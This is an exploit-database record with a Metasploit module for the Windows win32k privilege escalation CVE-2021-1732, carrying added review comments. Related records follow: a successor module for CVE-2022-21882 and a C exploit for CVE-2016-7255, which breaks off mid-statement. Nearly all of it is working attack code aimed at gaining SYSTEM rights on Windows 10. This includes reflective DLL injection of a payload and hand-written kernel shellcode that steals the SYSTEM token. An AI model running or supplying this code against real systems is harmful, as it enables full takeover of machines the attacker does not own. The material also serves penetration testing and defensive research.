ID PACKETSTORM:161880 Type packetstorm Reporter Spencer McIntyre Modified 2021-03-19T00:00:00
Description
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  # Local privilege escalation module for CVE-2021-1732 (win32k WndExtra
  # offset confusion). The Ruby side only performs OS-build and architecture
  # gating; the actual exploitation logic lives in the bundled
  # CVE-2021-1732.x64.dll, which is reflectively injected into the session
  # process together with the encoded payload.
  #
  # The 'Notes' below mark this as CRASH_OS_RESTARTS: a failed attempt can
  # bugcheck the host, so an unexplained kernel crash on a build in the
  # supported range is worth correlating with other signs of exploitation.
  Rank = GoodRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv # provides is_system?
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection # provides execute_dll
  # Runs #check automatically before #exploit so unsupported hosts are
  # rejected before any DLL is injected.
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata only; no runtime logic. The description text is a %q{}
  # literal, so its lines are left exactly as written.
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Win32k ConsoleControl Offset Confusion',
          'Description' => %q{
A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
achieve an out of bounds write operation, eventually leading to privilege escalation.
},
          'License' => MSF_LICENSE,
          'Author' => [
            'BITTER APT', # exploit as used in the wild
            'JinQuan', # detailed analysis
            'MaDongZe', # detailed analysis
            'TuXiaoYi', # detailed analysis
            'LiHao', # detailed analysis
            'KaLendsi', # github poc targeting v1909
            'Spencer McIntyre' # metasploit module
          ],
          # x64 only; the architecture checks in #exploit enforce this against
          # the live session.
          'Arch' => [ ARCH_X64 ],
          'Platform' => 'win',
          'SessionTypes' => [ 'meterpreter' ],
          'DefaultOptions' =>
          {
            'EXITFUNC' => 'thread'
          },
          'Targets' =>
          [
            [ 'Windows 10 v1803-20H2 x64', { 'Arch' => ARCH_X64 } ]
          ],
          'Payload' =>
          {
            'DisableNops' => true
          },
          'References' =>
          [
            [ 'CVE', '2021-1732' ],
            [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
            [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
            [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
            [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
            # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
            [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
            [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
            [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
            [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ]
          ],
          'DisclosureDate' => '2021-02-10',
          'DefaultTarget' => 0,
          'Notes' =>
          {
            'Stability' => [ CRASH_OS_RESTARTS, ],
            'Reliability' => [ REPEATABLE_SESSION, ]
          }
        }
      )
    )
  end

  # Version gate only. Returns CheckCode::Safe for non-Windows hosts and for
  # builds outside 17134..19042 (Windows 10 1803 through 20H2), otherwise
  # CheckCode::Appears. Nothing on the target is probed beyond sysinfo['OS'];
  # "Appears" therefore means "build is in the affected range", not that the
  # host was confirmed unpatched.
  def check
    sysinfo_value = sysinfo['OS']

    if sysinfo_value !~ /windows/i
      # Non-Windows systems are definitely not affected.
      return Exploit::CheckCode::Safe
    end

    # [0] is the whole match, i.e. the full build number; capture group 1
    # would typically hold only its trailing digit(s) after backtracking.
    # NOTE(review): String#match returns nil when the OS string carries no
    # build number, so `[0]` would raise here instead of yielding
    # CheckCode::Unknown — assumes sysinfo['OS'] always includes the build.
    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
    vprint_status("Windows Build Number = #{build_num}")

    # see https://docs.microsoft.com/en-us/windows/release-information/
    # 17134 = Windows 10 1803, 19042 = Windows 10 20H2 (matching the error
    # text below). The /10/ test is a loose substring match on the OS string.
    unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19042)
      print_error('The exploit only supports Windows 10 versions 1803 - 20H2')
      return CheckCode::Safe
    end

    CheckCode::Appears
  end

  # Refuses to run when the session is already SYSTEM or when the session,
  # host and selected target architectures disagree, then hands the
  # length-prefixed payload to the exploit DLL via reflective injection.
  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    # WOW64 (x86 session on an x64 host) and mismatched target selections are
    # rejected; fail_with aborts the module run.
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
    end

    encoded_payload = payload.encoded
    # The parameter block passed to the DLL is a little-endian unsigned
    # 32-bit length ('I<') immediately followed by the payload bytes. The
    # DLL is loaded from the framework's data directory, not from the target.
    execute_dll(
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-1732', 'CVE-2021-1732.x64.dll'),
      [encoded_payload.length].pack('I<') + encoded_payload
    )

    # Success here only means the DLL was injected; whether the payload ran
    # elevated is not verified by this module.
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
end
`
{"metasploit": [{"lastseen": "2022-03-17T17:54:12", "description": "A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to function on a wider range of Windows 10 targets.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-18T20:23:38", "type": "metasploit", "title": "Win32k ConsoleControl Offset Confusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-24T16:24:20", 
"id": "MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2022_21882_WIN32K/", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2022_21882_win32k/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = AverageRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::Deprecated\n moved_from 'exploit/windows/local/cve_2021_1732_win32k'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'Win32k ConsoleControl Offset Confusion',\n 'Description' => %q{\n A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n achieve an out of bounds write operation, eventually leading to privilege escalation.\n\n This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.\n In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is\n is the same for both vulnerabilities. 
This exploit combines the patch bypass with the original exploit to\n function on a wider range of Windows 10 targets.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n # CVE-2021-1732\n 'BITTER APT', # exploit as used in the wild\n 'JinQuan', # detailed analysis\n 'MaDongZe', # detailed analysis\n 'TuXiaoYi', # detailed analysis\n 'LiHao', # detailed analysis\n # CVE-2022-21882\n 'L4ys', # github poc\n # both CVEs\n 'KaLendsi', # github pocs\n # Metasploit exploit\n 'Spencer McIntyre' # metasploit module\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'References' => [\n # CVE-2021-1732 references\n [ 'CVE', '2021-1732' ],\n [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],\n [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],\n [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],\n # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit\n [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],\n [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],\n [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],\n [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],\n # CVE-2022-21882 references\n [ 'CVE', '2022-21882' ],\n [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]\n ],\n 'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date\n 
'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n 'SideEffects' => []\n }\n }\n )\n )\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return Exploit::CheckCode::Safe\n end\n\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Windows Build Number = #{build_num}\")\n\n unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)\n print_error('The exploit only supports Windows 10 versions 1803 - 21H2')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),\n [encoded_payload.length].pack('I<') + encoded_payload\n )\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2022_21882_win32k.rb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-02-28T16:54:53", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 
"UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-02-28T00:00:00", "type": "packetstorm", "title": "Win32k ConsoleControl Offset Confusion / Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-28T00:00:00", "id": "PACKETSTORM:166169", "href": "https://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = AverageRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::ReflectiveDLLInjection \nprepend Msf::Exploit::Remote::AutoCheck \n \ninclude Msf::Exploit::Deprecated \nmoved_from 'exploit/windows/local/cve_2021_1732_win32k' \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n{ \n'Name' => 'Win32k ConsoleControl Offset Confusion', \n'Description' => %q{ \nA vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of \nNT AUTHORITY\\SYSTEM. 
The flaw exists in how the WndExtra field of a window can be manipulated into being \ntreated as an offset despite being populated by an attacker-controlled value. This can be leveraged to \nachieve an out of bounds write operation, eventually leading to privilege escalation. \n \nThis flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. \nIn early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is \nis the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to \nfunction on a wider range of Windows 10 targets. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n# CVE-2021-1732 \n'BITTER APT', # exploit as used in the wild \n'JinQuan', # detailed analysis \n'MaDongZe', # detailed analysis \n'TuXiaoYi', # detailed analysis \n'LiHao', # detailed analysis \n# CVE-2022-21882 \n'L4ys', # github poc \n# both CVEs \n'KaLendsi', # github pocs \n# Metasploit exploit \n'Spencer McIntyre' # metasploit module \n], \n'Arch' => [ ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => { \n'EXITFUNC' => 'thread' \n}, \n'Targets' => [ \n[ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ] \n], \n'Payload' => { \n'DisableNops' => true \n}, \n'References' => [ \n# CVE-2021-1732 references \n[ 'CVE', '2021-1732' ], \n[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ], \n[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ], \n[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ], \n[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ], \n# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit \n[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ], \n[ 'URL', 
'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ], \n[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ], \n[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ], \n# CVE-2022-21882 references \n[ 'CVE', '2022-21882' ], \n[ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ], \n[ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ] \n], \n'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [ CRASH_OS_RESTARTS, ], \n'Reliability' => [ REPEATABLE_SESSION, ], \n'SideEffects' => [] \n} \n} \n) \n) \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn Exploit::CheckCode::Safe \nend \n \nbuild_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i \nvprint_status(\"Windows Build Number = #{build_num}\") \n \nunless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044) \nprint_error('The exploit only supports Windows 10 versions 1803 - 21H2') \nreturn CheckCode::Safe \nend \n \nCheckCode::Appears \nend \n \ndef exploit \nif is_system? 
\nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'Running against WOW64 is not supported') \nelsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 \nfail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') \nelsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') \nend \n \nencoded_payload = payload.encoded \nexecute_dll( \n::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'), \n[encoded_payload.length].pack('I<') + encoded_payload \n) \n \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/166169/cve_2022_21882_win32k.rb.txt"}, {"lastseen": "2017-01-12T02:03:22", "description": "", "cvss3": {}, "published": "2017-01-12T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Kernel win32k.sys NtSetWindowLongPtr Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": "2017-01-12T00:00:00", "id": "PACKETSTORM:140468", "href": "https://packetstormsecurity.com/files/140468/Microsoft-Windows-Kernel-win32k.sys-NtSetWindowLongPtr-Privilege-Escalation.html", "sourceData": "`// ricklarabee.blogspot.com \n \n//This program is free software; you can redistribute it and/or \n//modify it under the terms of the GNU General Public License \n//as published by the Free Software Foundation. 
\n \n//This program is distributed in the hope that it will be useful, \n//but WITHOUT ANY WARRANTY; without even the implied warranty of \n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the \n//GNU General Public License for more details. \n \n//You should have received a copy of the GNU General Public License \n//along with this program; if not, write to the Free Software \n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. \n \n// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255 \n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255 \n \n#include <windows.h> \n#include <wchar.h> \n#include <stdlib.h> \n#include <stdio.h> \n \n#pragma comment(lib,\"ntdll.lib\") \n#pragma comment(lib,\"user32.lib\") \n#pragma comment(lib, \"advapi32\") \n \nUINT64 PML4_BASE; \nUINT PML4_SELF_REF_INDEX; \nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68; \n \n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) \n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L) \n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \n \n//////////////////////////////////////////////////////// \n// Define Data Types \n//////////////////////////////////////////////////////// \ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { \nPVOID Unknown1; \nPVOID Unknown2; \nPVOID Base; \nULONG Size; \nULONG Flags; \nUSHORT Index; \nUSHORT NameLength; \nUSHORT LoadCount; \nUSHORT PathLength; \nCHAR ImageName[256]; \n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; \n \ntypedef struct _SYSTEM_MODULE_INFORMATION { \nULONG Count; \nSYSTEM_MODULE_INFORMATION_ENTRY Module[1]; \n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; \n \ntypedef enum _SYSTEM_INFORMATION_CLASS { \nSystemModuleInformation = 11, \nSystemHandleInformation = 16 \n} SYSTEM_INFORMATION_CLASS; \n \ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS 
SystemInformationClass, \nOUT PVOID SystemInformation, \nIN ULONG SystemInformationLength, \nOUT PULONG ReturnLength); \n \ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource, \nOUT PULONG Interval); \n \nNtQuerySystemInformation_t NtQuerySystemInformation; \nNtQueryIntervalProfile_t NtQueryIntervalProfile; \n \nchar shellcode[] = { \n//0xcc, \n0xfa, // CLI \n0x9c, // PUSHFQ \n0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer \n0x50, // PUSH RAX \n0x51, // PUSH RCX \n0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset] \n0x48, 0x89, 0x01, // MOV QWORD PTR [RCX], RAX \n0xb9, 0x90, 0x90, 0x90, 0x90, // MOV ECX, PID \n0x53, // PUSH RBX \n \n0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188 \n0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS \n0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset] \n//<tag> \n0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] \n0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID \n0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4 \n0x75, 0xf3, // JNE <tag> \n0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM \n \n0x53, // PUSH RBX \n//<tag2> \n0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] \n0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID \n0x39, 0xcb, // CMP EBX, ECX // our PID \n0x75, 0xf5, // JNE <tag2> \n0x5b, // POP RBX \n0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV QWORD PTR[RAX + 0x60], RBX \n \n0x5b, // POP RBX \n0x59, // POP RCX \n0x58, // POP RAX \n0x9d, // POPFQ \n \n0xfb, // STI \n0xff, 0xe0 // JMP RAX \n}; \n \nULONG __cdecl DbgPrint(__in char* Format, ...) 
\n{ \nCHAR* pszDbgBuff = NULL; \nva_list VaList = NULL; \nULONG ulRet = 0; \n \ndo \n{ \npszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR)); \nif (NULL == pszDbgBuff) \n{ \nbreak; \n} \nRtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR)); \n \nva_start(VaList, Format); \n \n_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList); \n \n \nOutputDebugStringA(pszDbgBuff); \n \nva_end(VaList); \n \n} while (FALSE); \n \nif (NULL != pszDbgBuff) \n{ \nHeapFree(GetProcessHeap(), 0, pszDbgBuff); \npszDbgBuff = NULL; \n} \n \nreturn ulRet; \n} \n \n \nint _sim_key_down(WORD wKey) \n{ \nINPUT stInput = { 0 }; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = 0; \n \nSendInput(1, &stInput, sizeof(stInput)); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_key_up(WORD wKey) \n{ \nINPUT stInput = { 0 }; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = KEYEVENTF_KEYUP; \n \nSendInput(1, &stInput, sizeof(stInput)); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_alt_shift_esc() \n{ \nint i = 0; \n \ndo \n{ \n_sim_key_down(VK_MENU); \n_sim_key_down(VK_SHIFT); \n \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_up(VK_MENU); \n_sim_key_up(VK_SHIFT); \n \n \n} while (FALSE); \n \nreturn 0; \n} \n \n \n \nint _sim_alt_shift_tab(int nCount) \n{ \nint i = 0; \nHWND hWnd = NULL; \n \n \nint nFinalRet = -1; \n \ndo \n{ \n_sim_key_down(VK_MENU); \n_sim_key_down(VK_SHIFT); \n \n \nfor (i = 0; i < nCount; i++) \n{ \n_sim_key_down(VK_TAB); \n_sim_key_up(VK_TAB); \n \nSleep(1000); \n \n} \n \n \n_sim_key_up(VK_MENU); \n_sim_key_up(VK_SHIFT); \n} while (FALSE); \n \nreturn nFinalRet; \n} \n \nint _sim_alt_esc(int count) \n{ \nint i = 0; \n \nfor (i = 0; i<count; i++) \n{ \n_sim_key_down(VK_MENU); \n//_sim_key_down(VK_SHIFT); \n \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n 
\n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_up(VK_MENU); \n//_sim_key_up(VK_SHIFT); \n \n} \n \nreturn 0; \n} \n \n \nint or_address_value_4(__in void* pAddress) \n{ \nWNDCLASSEXW stWC = { 0 }; \n \nHWND hWndParent = NULL; \nHWND hWndChild = NULL; \n \nWCHAR* pszClassName = L\"cve-2016-7255\"; \nWCHAR* pszTitleName = L\"cve-2016-7255\"; \n \nvoid* pId = NULL; \nMSG stMsg = { 0 }; \n \nUINT64 value = 0; \n \ndo \n{ \n \nstWC.cbSize = sizeof(stWC); \nstWC.lpfnWndProc = DefWindowProcW; \nstWC.lpszClassName = pszClassName; \n \nif (0 == RegisterClassExW(&stWC)) \n{ \nbreak; \n} \n \nhWndParent = CreateWindowExW( \n0, \npszClassName, \nNULL, \nWS_OVERLAPPEDWINDOW | WS_VISIBLE, \n0, \n0, \n360, \n360, \nNULL, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndParent) \n{ \nbreak; \n} \n \nhWndChild = CreateWindowExW( \n0, \npszClassName, \npszTitleName, \nWS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD, \n0, \n0, \n160, \n160, \nhWndParent, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndChild) \n{ \nbreak; \n} \n \n#ifdef _WIN64 \npId = ((UCHAR*)pAddress - 0x28); \n#else \npId = ((UCHAR*)pAddress - 0x14); \n#endif // #ifdef _WIN64 \n \nSetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId); \n \nDbgPrint(\"hWndChild = 0x%p\\n\", hWndChild); \n \nShowWindow(hWndParent, SW_SHOWNORMAL); \n \nSetParent(hWndChild, GetDesktopWindow()); \n \nSetForegroundWindow(hWndChild); \n \n_sim_alt_shift_tab(4); \n \nSwitchToThisWindow(hWndChild, TRUE); \n \n_sim_alt_shift_esc(); \n \nwhile (GetMessage(&stMsg, NULL, 0, 0)) { \n \nSetFocus(hWndParent); \n_sim_alt_esc(20); \nSetFocus(hWndChild); \n_sim_alt_esc(20); \n \nTranslateMessage(&stMsg); \nDispatchMessage(&stMsg); \n \nif (value != 0) { \nbreak; \n} \n \n \n__try { \nvalue = *(UINT64 